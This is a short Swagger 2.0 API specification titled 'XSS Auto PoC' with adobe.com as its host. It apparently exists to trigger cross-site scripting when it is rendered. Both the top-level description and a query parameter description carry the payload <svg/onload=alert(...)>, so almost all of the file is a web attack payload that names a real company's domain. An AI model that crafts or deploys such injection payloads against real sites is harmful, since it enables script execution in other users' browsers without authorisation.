swagger: "2.0"
info:
  title: XSS Auto PoC
  description: |
    <svg/onload=alert('XSS via SVG Adobe')>
  version: "1.0"
host: adobe.com
basePath: /
schemes:
  - https
paths:
  /autoxss:
    get:
      tags:
        - xss
      summary: Autofocus XSS Trigger
      parameters:
        - name: auto
          in: query
          required: false
          type: string
          description: |
            <svg/onload=alert('XSS via SVG Adobe')>
      responses:
        '200':
          description: OK
